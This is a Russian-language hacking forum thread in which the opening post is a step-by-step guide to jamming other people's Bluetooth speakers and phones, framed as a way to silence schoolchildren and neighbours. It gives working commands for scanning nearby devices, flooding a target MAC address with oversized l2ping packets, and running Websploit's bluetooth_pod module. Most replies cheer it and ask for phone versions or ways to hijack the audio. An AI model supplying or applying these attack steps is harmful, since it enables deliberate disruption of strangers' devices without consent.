DDOS - Bluetooth (Или как усмирить школоту со своими колонками)

    Тема в разделе Брут создана пользователем Автор темы Cherniyiastreb Дата начала
  • Просмотры 32K просмотров
Статус
В этой теме нельзя размещать новые ответы.

Marcus Radblack

Новорег

Marcus Radblack

Новорег
Статус
Offline
Регистрация
7 Мар 2022
Сообщения
2
Лайки
0
Всем привет, Вас наверное иногда подбешивают эти школьники со своими блютуз колонками, а особенно их песни.

Сегодня я вам расскажу, как за-ddos-ить блютуз.

Для начала нам нужно найти подходящие устройства в зоне досягаемости.

Для этого используем команду:
Код:
$ hcitool scan

В результате этой нехитрой манипуляции ты получишь список доступных устройств с Bluetooth с их MAC-адреса.
Если твоя система не видит адаптер Bluetooth, то я рекомендую поставить один из менеджеров Bluetooth для Linux.

В Kali лично мне подошел gnome-bluetooth, который можно установить следующей командой:

Код:
$ apt-get install gnome-bluetooth

Еще можно воспользоваться утилитой - blueman:

Код:
$ apt-get install blueman

Получив список потенциальных жертв, можно расправиться с их синезубыми девайсами несколькими способами.

Рассмотрим каждый по отдельности.

-------------------------------------------------------------------------------

Первый способ. DDoS атака на Bluetooth - l2ping

Воспользуемся такой командой:


Код:
$ l2ping -i hci0 -s <packet value> -f <MAC_address>

Она сгенерирует пакеты указанного тобой в параметре <packet value> объема и будет отсылать эти пакеты на MAC-адрес, записанный в качестве параметра <MAC_address>.

В конце концов ты увидишь такую картину: в терминале время отклика будет постепенно увеличиваться, а на атакуемом устройстве, скорее всего, просто отключится Bluetooth.

Через какое-то время он все равно включится, но музыка прервется, и некоторое удовлетворение будет получено.

Второй способ: Websploit


Существует более элегантный и удобный способ заглушить колонку, из которой доносятся жизнерадостные звуки рэпа.

Запускаем утилиту Websploit:

Код:
$ websploit

Набираем в консоли команду:

Код:
$ show modules

Она продемонстрирует нам все модули, которые работают с этой утилитой.
Там есть множество компонентов, работающих с Wi-Fi, но нас интересует конкретно модуль bluetooth/bluetooth_pod:

Код:
$ use bluetooth/bluetooth_pod

Теперь нужно настроить все параметры и указать сведения об атакуемом устройстве:


Код:
$ show options[/B][/CENTER]
[B][CENTER]$ set bdaddr <MAC_address>

Чтобы точно и наверняка угробить Bluetooth, мы изменим размер отсылаемого пакета:

Код:
$ set size 999

Все подготовительные действия завершены, можем запускать нашу «машину для убийств»

Код:
$ run

На выходе мы увидим абсолютно похожую картину: пинги становятся дольше, а музыка прерывается. Красота!



Эти два способа будут работать практически с любыми блютусными колонками, гарнитурами и прочими похожими устройствами.
Просто потому, что производители не выпускают для них новые прошивки, способные фильтровать входящие пакеты. Так что, если у тебя есть ноутбук с «Линуксом» на борту, ты точно можешь назвать себя грозой портативных колонок.

Если колонка справляется с атакой, можно попробовать отправить пакеты на сам телефон, к которому она подключена. Лично я тестировал этот метод на довольно мощной портативной колонке (JBL Xtreme), и она более-менее справлялась с нагрузкой. Но дешевые китайские поделки такая атака вырубает на раз.
Вау, Спасибо, ты гений !
--- Добавлено позже: ---

Можно теперь им вместо моргена врубать стоны мужские
Они будут не против )
 

Yreeer

Новорег

Yreeer

Новорег
Статус
Offline
Регистрация
6 Апр 2021
Сообщения
5
Лайки
0
Гайд полезный конечно , но ведь не всегда имеет ноутбук под рукой
--- Добавлено позже: ---


Я обычно таким утром свое музло включаю , в тот момент когда они спать хотят)
У меня сверху соседи шумят с 5 утра до 2 ночи, вообще непонятно как высыпаются...
Я им вибро динамик подрубаю когда слишком шумно, сразу успокаиваются
 

Lirizzz

Новорег

Lirizzz

Новорег
Статус
Offline
Регистрация
8 Апр 2022
Сообщения
5
Лайки
5
А что насчёт защиты от такого? Найдутся же гении, которые будут абсолютно всем и всё глушить:confused:
 

Dron

Новорег

Dron

Новорег
Статус
Offline
Регистрация
19 Мар 2021
Сообщения
2
Лайки
18
Было бы хорошо на винде или андроид)
 

Dron

Новорег

Dron

Новорег
Статус
Offline
Регистрация
19 Мар 2021
Сообщения
2
Лайки
18
Хотя бы на андройде)
 

Lord_farquaaaad

Пользователь

Lord_farquaaaad

Пользователь
Статус
Offline
Регистрация
26 Мар 2021
Сообщения
26
Лайки
29
Реально, а можно как то сообразить на мобиле? Ибо тема актуальна т.к живу в частном доме и надоели твари соседские со своими колонками..
--- Добавлено позже: ---

Нельзя.
Интересовался уже на эту тему, быть может можно было бы, если бы кали нетхантер умел адекватно работать с блютузом, но он не умеет.
А нет инфы по приспособам? Просто раньше видал устройства уровня глушилок и перехвата сигнала ( собранное любителями), но хз легально ли вообще такое продавать)
 
Последнее редактирование:
ItsOlegDm
ItsOlegDm
Нельзя.
Интересовался уже на эту тему, быть может можно было бы, если бы кали нетхантер умел адекватно работать с блютузом, но он не умеет.
 
K
keks1903
А можно ли перехватывать блютуз, чтобы свой звук транслировать?
 

ogog4271

Новорег

ogog4271

Новорег
Статус
Offline
Регистрация
30 Апр 2022
Сообщения
22
Лайки
10
Мои соседи походу прошареные, через аух подключаются. Никаких блютусов не обнаружил😆 а кто пробовал? Рабочий способ?
 

Папуас

Новорег

Папуас

Новорег
Статус
Offline
Регистрация
27 Май 2022
Сообщения
15
Лайки
14
Я проверял на домашней колонке у меня не получилось
 

mavrrrr

Новорег

mavrrrr

Новорег
Статус
Offline
Регистрация
23 Июн 2022
Сообщения
4
Лайки
0
хызы , вроде колонки уже не актуальны и особо ими никто не раздражает, автору респект, был бы ты в 2018
 

LoveYouAndLife

Пользователь

LoveYouAndLife

Пользователь
Статус
Offline
Регистрация
10 Авг 2021
Сообщения
113
Лайки
73
аххахаха, бля, уже представляю лица перепуганных школьников
спасибо аниномусам)9)
 

SoloAbuse

Новорег

SoloAbuse

Новорег
Статус
Offline
Регистрация
18 Июн 2022
Сообщения
49
Лайки
12
Замудрено, пробовал с другом на его колонке- результата ноль, думаб новые колонки(была jbl5) делают как-то безопасней в этом плане
 

Kioqwe4

Новорег

Kioqwe4

Новорег
Статус
Offline
Регистрация
12 Окт 2021
Сообщения
9
Лайки
2
Хороша темка, живу напротив школы и рядом с парком, где всегда ночью долбит музыка из блютуз колонок, самое оно щас в начале учебного года
 

nikich1010

Новорег

nikich1010

Новорег
Статус
Offline
Регистрация
25 Мар 2021
Сообщения
2
Лайки
1
Ну ради этого виртуалку ставить лень. Но все же крайне годная штука
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху